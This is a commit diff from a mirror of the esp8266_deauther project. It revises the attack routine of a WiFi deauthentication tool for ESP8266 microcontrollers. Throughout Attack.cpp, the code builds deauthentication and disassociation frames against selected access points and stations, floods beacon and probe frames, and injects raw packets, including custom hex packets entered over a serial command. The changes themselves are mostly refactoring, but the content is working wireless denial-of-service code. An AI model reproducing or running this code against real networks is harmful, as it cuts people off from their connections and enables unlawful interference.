eessppeelllloo/esp8266_deauther
1
0
Fork 0
mirror of https://github.com/SpacehuhnTech/esp8266_deauther.git synced 2025-12-16 19:50:02 +01:00
Code Issues Packages Projects Releases Wiki Activity

Improved attack routine

Browse Source 
- less count() calls
- fixed the deauth station crash (hopefully)
- sort targets after channel for better performance
- increment counter in deauth/beacon/probe function and not in sendPacket() that was stupid anyway
This commit is contained in:
Stefan Kremser
2018-03-25 10:26:55 +02:00
parent 7d26b0741f
commit e494d95c15
5 changed files with 82 additions and 44 deletions
Download Patch File Download Diff File Expand all files Collapse all files

83
esp8266_deauther/Attack.cpp
View File

@@ -23,7 +23,8 @@ void Attack::start() {
prntln(A_START); prntln(A_START);
attackTime = currentTime; attackTime = currentTime;
attackStartTime = currentTime; attackStartTime = currentTime;
//accesspoints.sortAfterChannel(); accesspoints.sortAfterChannel();
stations.sortAfterChannel();
running = true; running = true;
} }
@@ -41,6 +42,8 @@ void Attack::start(bool beacon, bool deauth, bool deauthAll, bool probe, bool ou
start(); start();
} else { } else {
prntln(A_NO_MODE_ERROR); prntln(A_NO_MODE_ERROR);
accesspoints.sort();
stations.sort();
stop(); stop();
} }
} }
@@ -131,6 +134,10 @@ String Attack::getStatusJSON() {
void Attack::update() { void Attack::update() {
if (!running || scan.isScanning()) return; if (!running || scan.isScanning()) return;
apCount = accesspoints.count();
stCount = stations.count();
nCount = names.count();
// run/update all attacks // run/update all attacks
deauthUpdate(); deauthUpdate();
deauthAllUpdate(); deauthAllUpdate();
@@ -150,28 +157,28 @@ void Attack::deauthUpdate() {
if (!deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) { if (!deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) {
if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) { if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) {
// APs // APs
if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) { if (apCount > 0 && deauth.tc < apCount) {
if (accesspoints.getSelected(deauth.tc)) { if (accesspoints.getSelected(deauth.tc)) {
deauth.tc += deauthAP(deauth.tc); deauth.tc += deauthAP(deauth.tc);
} else deauth.tc++; } else deauth.tc++;
} }
// Stations // Stations
else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) { else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) {
if (stations.getSelected(deauth.tc - accesspoints.count())) { if (stations.getSelected(deauth.tc - apCount)) {
deauth.tc += deauthStation(deauth.tc - accesspoints.count()); deauth.tc += deauthStation(deauth.tc - apCount);
} else deauth.tc++; } else deauth.tc++;
} }
// Names // Names
else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < names.count() + stations.count() + accesspoints.count()) { else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < nCount + stCount + apCount) {
if (names.getSelected(deauth.tc - stations.count() - accesspoints.count())) { if (names.getSelected(deauth.tc - stCount - apCount)) {
deauth.tc += deauthName(deauth.tc - stations.count() - accesspoints.count()); deauth.tc += deauthName(deauth.tc - stCount - apCount);
} else deauth.tc++; } else deauth.tc++;
} }
// reset counter // reset counter
if (deauth.tc >= names.count() + stations.count() + accesspoints.count()) if (deauth.tc >= nCount + stCount + apCount)
deauth.tc = 0; deauth.tc = 0;
} }
} }
@@ -181,7 +188,7 @@ void Attack::deauthAllUpdate() {
if (deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) { if (deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) {
if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) { if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) {
// APs // APs
if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) { if (apCount > 0 && deauth.tc < apCount) {
tmpID = names.findID(accesspoints.getMac(deauth.tc)); tmpID = names.findID(accesspoints.getMac(deauth.tc));
if (tmpID < 0) { if (tmpID < 0) {
deauth.tc += deauthAP(deauth.tc); deauth.tc += deauthAP(deauth.tc);
@@ -191,24 +198,24 @@ void Attack::deauthAllUpdate() {
} }
// Stations // Stations
else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) { else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) {
tmpID = names.findID(stations.getMac(deauth.tc - accesspoints.count())); tmpID = names.findID(stations.getMac(deauth.tc - apCount));
if (tmpID < 0) { if (tmpID < 0) {
deauth.tc += deauthStation(deauth.tc - accesspoints.count()); deauth.tc += deauthStation(deauth.tc - apCount);
} else if (!names.getSelected(tmpID)) { } else if (!names.getSelected(tmpID)) {
deauth.tc += deauthStation(deauth.tc - accesspoints.count()); deauth.tc += deauthStation(deauth.tc - apCount);
} else deauth.tc++; } else deauth.tc++;
} }
// Names // Names
else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < accesspoints.count() + stations.count() + names.count()) { else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < apCount + stCount + nCount) {
if (!names.getSelected(deauth.tc - accesspoints.count() - stations.count())) { if (!names.getSelected(deauth.tc - apCount - stCount)) {
deauth.tc += deauthName(deauth.tc - accesspoints.count() - stations.count()); deauth.tc += deauthName(deauth.tc - apCount - stCount);
} else deauth.tc++; } else deauth.tc++;
} }
// reset counter // reset counter
if (deauth.tc >= names.count() + stations.count() + accesspoints.count()) if (deauth.tc >= nCount + stCount + apCount)
deauth.tc = 0; deauth.tc = 0;
} }
} }
@@ -233,15 +240,15 @@ void Attack:: beaconUpdate() {
} }
} }
bool Attack::deauthStation(uint8_t num) { bool Attack::deauthStation(int num) {
return deauthDevice(accesspoints.getMac(stations.getAP(num)), stations.getMac(num), settings.getDeauthReason(), accesspoints.getCh(stations.getAP(num))); return deauthDevice(accesspoints.getMac(stations.getAP(num)), stations.getMac(num), settings.getDeauthReason(), accesspoints.getCh(stations.getAP(num)));
} }
bool Attack::deauthAP(uint8_t num) { bool Attack::deauthAP(int num) {
return deauthDevice(accesspoints.getMac(num), broadcast, settings.getDeauthReason(), accesspoints.getCh(num)); return deauthDevice(accesspoints.getMac(num), broadcast, settings.getDeauthReason(), accesspoints.getCh(num));
} }
bool Attack::deauthName(uint8_t num) { bool Attack::deauthName(int num) {
if (names.isStation(num)) { if (names.isStation(num)) {
return deauthDevice(names.getBssid(num), names.getMac(num), settings.getDeauthReason(), names.getCh(num)); return deauthDevice(names.getBssid(num), names.getMac(num), settings.getDeauthReason(), names.getCh(num));
} else { } else {
@@ -265,22 +272,36 @@ bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_
// send deauth frame // send deauth frame
deauthPacket[0] = 0xc0; deauthPacket[0] = 0xc0;
if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets())) if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
success = true; success = true;
// send disassociate frame // send disassociate frame
deauthPacket[0] = 0xa0; deauthPacket[0] = 0xa0;
if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets())) if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
success = true; success = true;
// send another packet, this time from the station to the accesspoint // send another packet, this time from the station to the accesspoint
if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast
if (deauthDevice(stMac, apMac, reason, ch)) { // build deauth packet
memcpy(&deauthPacket[4], apMac, 6);
memcpy(&deauthPacket[10], stMac, 6);
memcpy(&deauthPacket[16], stMac, 6);
// send deauth frame
deauthPacket[0] = 0xc0;
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
success = true;
// send disassociate frame
deauthPacket[0] = 0xa0;
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
success = true; success = true;
}
} }
if (success) deauth.time = currentTime; if (success){
deauth.time = currentTime;
deauth.packetCounter++;
}
return success; return success;
} }
@@ -310,8 +331,9 @@ bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
beaconPacket[82] = ch; beaconPacket[82] = ch;
if (sendPacket(beaconPacket, packetSize, &beacon.packetCounter, ch, settings.getForcePackets())) { if (sendPacket(beaconPacket, packetSize, ch, settings.getForcePackets())) {
beacon.time = currentTime; beacon.time = currentTime;
beacon.packetCounter++;
return true; return true;
} }
@@ -332,15 +354,16 @@ bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) {
memcpy(&probePacket[10], mac, 6); memcpy(&probePacket[10], mac, 6);
memcpy(&probePacket[26], ssid, ssidLen); memcpy(&probePacket[26], ssid, ssidLen);
if (sendPacket(probePacket, packetSize, &probe.packetCounter, ch, settings.getForcePackets())) { if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
probe.time = currentTime; probe.time = currentTime;
probe.packetCounter++;
return true; return true;
} }
return false; return false;
} }
bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries) { bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries) {
//Serial.println(bytesToStr(packet, packetSize)); //Serial.println(bytesToStr(packet, packetSize));
// set channel // set channel
@@ -351,11 +374,9 @@ bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCo
// try again until it's sent out // try again until it's sent out
for (int i = 0; i < tries && !sent; i++) { for (int i = 0; i < tries && !sent; i++) {
yield();
sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0; sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
} }
if (sent) (*packetCounter)++;
return sent; return sent;
} }

16
esp8266_deauther/Attack.h
View File

@@ -42,9 +42,9 @@ class Attack {
void status(); void status();
String getStatusJSON(); String getStatusJSON();
bool deauthAP(uint8_t num); bool deauthAP(int num);
bool deauthStation(uint8_t num); bool deauthStation(int num);
bool deauthName(uint8_t num); bool deauthName(int num);
bool deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch); bool deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch);
bool sendBeacon(uint8_t tc); bool sendBeacon(uint8_t tc);
@@ -53,7 +53,7 @@ class Attack {
bool sendProbe(uint8_t tc); bool sendProbe(uint8_t tc);
bool sendProbe(uint8_t* mac, const char* ssid, uint8_t ch); bool sendProbe(uint8_t* mac, const char* ssid, uint8_t ch);
bool sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries); bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries);
bool isRunning(); bool isRunning();
@@ -91,12 +91,16 @@ class Attack {
uint32_t beaconPkts = 0; uint32_t beaconPkts = 0;
uint32_t probePkts = 0; uint32_t probePkts = 0;
int8_t tmpID; uint8_t apCount = 0;
uint8_t stCount = 0;
uint8_t nCount = 0;
int8_t tmpID = -1;
uint16_t packetSize = 0; uint16_t packetSize = 0;
uint32_t attackTime = 0; // for counting how many packets per second uint32_t attackTime = 0; // for counting how many packets per second
uint32_t attackStartTime = 0; uint32_t attackStartTime = 0;
uint32_t timeout; uint32_t timeout = 0;
// random mac address for making the beacon packets // random mac address for making the beacon packets
uint8_t mac[6] = {0xAA,0xBB,0xCC,0x00,0x11,0x22}; uint8_t mac[6] = {0xAA,0xBB,0xCC,0x00,0x11,0x22};

8
esp8266_deauther/SerialInterface.cpp
View File

@@ -889,8 +889,12 @@ void SerialInterface::runCommand(String input) {
for (int i = 0; i < packetSize; i++) for (int i = 0; i < packetSize; i++)
packet[i] = strtoul((packetStr.substring(i * 2, i * 2 + 2)).c_str(), NULL, 16); packet[i] = strtoul((packetStr.substring(i * 2, i * 2 + 2)).c_str(), NULL, 16);
if (attack.sendPacket(packet, packetSize, &counter, wifi_channel, 10)) prntln(CLI_CUSTOM_SENT); if (attack.sendPacket(packet, packetSize, wifi_channel, 10)){
else prntln(CLI_CUSTOM_FAILED); prntln(CLI_CUSTOM_SENT);
counter++;
} else{
prntln(CLI_CUSTOM_FAILED);
}
} }
// ===== LED ===== // // ===== LED ===== //

8
esp8266_deauther/Stations.cpp
View File

@@ -35,6 +35,14 @@ void Stations::sort() {
}); });
} }
void Stations::sortAfterChannel() {
list->sort([](Station & a, Station & b) -> int{
if (a.ch == b.ch) return 0;
if (a.ch < b.ch) return -1;
if (a.ch > b.ch) return 1;
});
}
void Stations::removeAll() { void Stations::removeAll() {
internal_removeAll(); internal_removeAll();
prntln(ST_CLEARED_LIST); prntln(ST_CLEARED_LIST);

1
esp8266_deauther/Stations.h
View File

@@ -27,6 +27,7 @@ class Stations {
Stations(); Stations();
void sort(); void sort();
void sortAfterChannel();
void select(int num); void select(int num);
void deselect(int num); void deselect(int num);